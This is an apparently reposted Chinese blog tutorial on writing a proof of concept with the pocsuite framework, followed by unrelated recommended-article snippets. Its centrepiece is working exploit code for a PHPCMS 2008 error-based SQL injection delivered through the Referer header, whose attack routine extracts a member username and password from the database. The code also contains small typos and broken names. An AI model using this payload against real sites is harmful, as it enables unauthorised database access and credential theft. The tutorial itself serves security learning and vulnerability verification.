学习POC框架pocsuite--编写hellowordPOC

最新推荐文章于 2024-10-12 12:26:23 发布
最新推荐文章于 2024-10-12 12:26:23 发布
阅读量275 收藏
点赞数
文章标签: python php
原文链接:http://www.cnblogs.com/KevinGeorge/p/7775845.html
版权

  在这里,首先向安全圈最大的娱乐公司,某404致敬。

  参考博文 https://www.seebug.org/help/dev 向seebug平台及该文原作者致敬,虽然并不知道是谁

  长话短说其实,可自由发挥的部分并不多,以原博文中的SQL注入的例子(web应用漏洞)来记录自己的学习心得笔记。

  感觉整篇POC能自己发挥的并不多,从代码上看,几乎90%的代码照要求填写即可,自由发挥的部分,基本就是构造URL payload,发包匹配回显。嗯,就酱。

  镣铐起舞更美是不,哎,其他的照抄吧,自由发挥的部分主要在于漏洞研究,不在于开发代码部分。抽时间还是要写一写的,想要个自己的站点balabala

 1 #!/usr/bin/env python
 2 # -*- coding:utf-8 -*-
 3 
 4 #import system lib files
 5 import os#并没有用啊,我只是很喜欢这个库的名字,觉得很好看
 6 import re
 7 import sys#并没有用啊,我还是很喜欢这个库的名字,觉得很好看
 8 import json#并没有用啊,我还是很喜欢这个库的名字,觉得很好看
 9 import urlparse
10 
11 #import pocsuite lib file下面是要用到的pocsuite框架的一些函数或者类
12 from pocsuite.net import reg
13 from pocsuite.poc import POCBase
14 from pocsuite.utils import register
15 
16 class mytest_poc(POCBase):
17     vulID = '62274'     #漏洞编号-ssvid
18     version = 1           #poc version
19     author = ["no.1 author","no.2 author",...] #author name list
20     vulDate = '2011-11-21'  #vul discory(report) date
21     createDate = '2015-09-23' #poc create date
22     updateDate = '2015-09-23' #poc update date
23     referercens = ["http://www.seebug.org/vuldb/ssvid-62274"] #参考文献
24     name = '_62274_phpcms_2008_place_sql_inj_PoC' #poc script name
25     appPowerLink = 'http://www.phpcms.cn' #app vendor link
26     appName = 'PHPCMS'
27     appVersion = '2008'
28     vulType = 'SQL Injection' # 漏洞类型
29     desc = """balabala""" #描述
30     samples = ['http://10.1.200.28/']
31     
32     def _attack(self):
33         result = {}
34         vulurl = urlparse.urljson(self.url, '/data/js.php?id=1')
35         payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#"
36         head = {
37             'Referer': payload
38         }
39         resp = reg.get(vulurl,headers=head)
40         if resp.status_code == 200:
41             match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', resp.content, re.I | re.M)
42             if match_result:
43                 result['AdminInfo'] = {}
44                 result['AdminInfo']['Username'] = match_result.group(1)
45                 result['AdminInfo']['Password'] = match_result.group(2)
46         return self.parse_attack(result)
47         
48     def _verify(self):
49         result = {}
50         vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
51         payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"
52         head = {
53             'Referer': payload
54         }
55         resp = req.get(vulurl, headers=head)
56         if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
57             result['VerifyInfo'] = {}
58             result['VerifyInfo']['URL'] = vulurl
59             result['VerifyInfo']['Payload'] = payload
60 
61         return self.parse_attack(result)
62         
63     def parse_attack(self, result):
64         output = Output(self)
65         if result:
66             output.success(result)
67         else:
68             output.fail('Internet nothing returned')
69         return output
70 
71 register(mytest_poc)

 

  

转载于:https://www.cnblogs.com/KevinGeorge/p/7775845.html

weixin_30929295
关注
Pocsuite3渗透测试框架编写POC和EXP脚本
悦分享
07-07 5801
一、Pocsuite3简介编写poc和exp并不是大佬们才会的,借助于某些框架,小白也可以编写自己的poc和exp,并且实现批量刷SRC。我们这里使用Pocsuite 3 来实现自己编写脚本,Pocsuite是由”知道创宇404实验室”打造的一款开源的远程漏洞测试框架,你可以直接使用它进行漏洞的验证与利用,也可以基于它进行POC/EXP的开发Pocsuite 3用Pyhton3编写,支持verify、attack及shell三种模式,可以通过指定单个目标或者从文件中导入多个目标,使用单个POC或者POC集合
Pocsuite-poc-exp:分享一些自己写的pocexp
05-17
Pocsuite-poc-exp 是一个基于Python开发的漏洞检测工具包,主要被安全研究人员和渗透测试人员用于验证网络系统中的安全漏洞。这个项目的核心目的是为了收集、分享和执行各种Proof of Concept (PoC) 和exploit代码,...
Pocsuite3框架POC/EXP编写练习:Flask(Jinja2) 服务端模板注入漏洞
qq_46145027的博客
04-19 996
Pocsuite3 是由打造的一款基于 GPLv2 许可证开源的远程漏洞测试框架。可以用来编写POC/EXP,今天借助Flask框架下的SSTI漏洞练习记录一下Pocsuite3框架的配置和编写过程。
如何编写POC/EXP
weixin_45626840的博客
01-10 3374
理解并编写POC/EXP
poc框架poc编写
weixin_48776804的博客
07-24 829
poc框架poc编写1 pocassist2 pocsuite33 主要是两个框架,第一个相对好用一点 1 pocassist 2 pocsuite3 3 其他poc https://hub.fastgit.org/WooYun/TangScan
POC编写基础————1、基础知识
热门推荐
Fly_鹏程万里
02-27 1万+
前言 本系列内容主要讲解POC编写,而笔者也是一个小小白,刚刚学习POC编写不久,打算记录一些心得,有兴趣的可以一起讨论,一起交流,同时可以一起分享各自收藏或者编写POC进行学习! 什么是POC PoC(全称: Proof of Concept), 中文可译作“观点验证程序”,它主要用于证明提出者的观点是否正确,在信息安全领域这种观点一般是我们对于漏洞的判断,即目标系统是否存在漏洞。 ...
Some-PoC-oR-ExP:各种漏洞poc、Exp的收集或编写
04-28
在"压缩包子文件的文件名称列表"中提到的"Some-PoC-oR-ExP-master"很可能是一个包含所有PoC和Exp的代码仓库。在这个仓库中,你可能找到不同类型的PoC和Exp,比如针对Web应用的SQL注入PoC,针对操作系统层面的缓冲区...
poc-route-autoload
04-29
标题“poc-route-autoload”涉及的是一个关于路由自动加载的Proof of Concept(概念验证)项目,主要在Node.js环境中实现。在这个项目中,我们关注的是如何高效地管理和动态加载应用中的路由,以便于构建RESTful API...
some_pocsuite:用于漏洞排查的pocsuite3验证POC代码
05-23
插件代码编写使用pocsuite3 漏洞测试框架,插件编写请参考 pocsuite3 项目插件编写要求。序号poc说明1hikvision-2013-4976_web_login-bypass.py海康威视cve-2013-4976匿名登录验证绕过2weblogic-vul-check_all_rce....
BeeCli是一款基于开源PoC框架Beebeeto-framework进行开发的程序
04-02
BeeCli是一款基于开源PoC框架Beebeeto-framework进行开发的程序,它集PoC下载,本地PoC搜索、目标抓取、批量扫描等功能于一身。你还可以通过Beebeeto-framework编写自己的PoC进行批量测试。 使用BeeCli可以很方便的...
基于PythonPoc框架
走在成功路上的博客
02-15 930
0. 前言 因疫情在忙其他事情也很久没上,无意看到一个较为完善的poc框架及原理这里分享大家共同学习讨论。 1. 框架代码如下 #!/usr/bin/env python #coding:utf-8 import requests class misiinfo(object): def __init__(self,request=None,response=None): ...
使用Pocsuite3框架编写简单PoC例子
情感博主V
01-13 6389
简介和安装 Pocsuite3简介和安装 PoC编写基本规则 在此框架下,有编写POC的指定规则 以CMSEasy5.5的SQL注入漏洞PoC为例 1、首先创建.py文件,命名规则: PoC命名分成3个部分组成漏洞应用名_版本号_漏洞类型名称 然后把文件名称中的所有字母改成小写,所有的符号改成_. 文件 例子的.py文件名为:_88979_cmseasy_5_5_sql_injection....
如何打造自己的PoC框架-Pocsuite3-使用篇
cp15191163199的博客
04-25 4253
相比于无聊的用法介绍,我更想说一下Pocsuite3为什么会有这些功能以及是如何实现的。如果你也想制造一款类似的工具,Pocsuite3的一些思想或许能够帮助到你。本文同时也是记录Pocsuite3开发过程中的一些思考与理解...
如何打造自己的PoC框架-Pocsuite3-框架
晓得哥的博客
05-13 3955
本节笔者将按照Pocsuite框架结构以及工程化实践,来实现一款自己的PoC框架。为了开一个好头,我们先取一个好听的名字,想威武霸气一些可以取上古神器之类的,诸如轩辕夏禹赤霄干将,若怀着对游戏的热爱也可以有山丘之王(Mountain King)剑圣(BladeMaster)月之女神(Priess Of the moon)。由于笔者比较懒,我们就取一个朴素的名字:AirPoc,中文名叫它"空气炮"吧...
【人工智能学习之PaddleOCR快速上手】
最新发布
Jiagym的博客
10-12 1089
在配置文件中,可以设置组建模型、优化器、损失函数、模型前后处理的参数,PaddleOCR从配置文件中读取到这些参数,进而组建出完整的训练流程,完成模型训练,在需要对模型进行优化的时,可以通过修改配置文件中的参数完成配置,使用简单且方便修改。而 L2 正则化中,添加正则化项的目的在于减少参数平方的总和。准确检测的标准是检测框与标注框的IOU大于某个阈值,正确识别的检测框中的文本与标注的文本相同。如果缺少带标注的数据,或者不想投入研发成本,建议直接调用开放的API,开放的API覆盖了目前比较常见的一些垂类。
python中zip()与zip(*)的用法解析
m0_51579041的博客
10-08 305
zip()与zip(*)的用法解析
gligen安装部署笔记
jacke121的专栏
10-08 295
gligen安装部署笔记
文本区域分割系统源码&数据集分享
lzmlzm89的博客
10-08 1384
数据集信息展示在现代计算机视觉领域,文本区域分割的研究日益受到重视,尤其是在处理文档图像和名片等场景时。为此,我们构建了一个名为“more2”的数据集,旨在为改进YOLOv8-seg模型提供丰富的训练素材,以提升其在文本区域分割任务中的表现。该数据集包含五个类别,具体包括“0”、“2”、“business-name-card”、“doc”和“wendang”,每个类别均具有独特的特征和应用场景,能够为模型的训练提供多样化的样本。
python安装第三方库的问题与解决方法
WANGWUSAN66的博客
10-10 772
大部分第三方库都是在国外网站,如果直接使用pip install 包名,下载速度会很慢,这对一些大型包是很致命的,如果下载中断则需要重头再来。安装某些包时,进行到一半出现构建wheel错误,这可能由于某些神秘的原因造成的,非常让人恼火。有些包(如rasterstats)既不能通过pip安装,在2中的网站也找不到,该怎么办?在python第三方库综合网站上搜索这个包,手动下载whl文件,下载完成后使用。解决方案:使用国内镜像(如清华镜像下载),速度很容易达到1M以上;
poc-yaml-go-pprof-leak
09-11
根据引用和引用的信息,poc-yaml-go-pprof-leak是一个与pprof定位问题相关的内容。pprof是一个用于性能分析和故障排查的工具,它可以帮助我们定位代码中的问题。通过使用pprof,我们可以获取代码的性能剖析数据,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值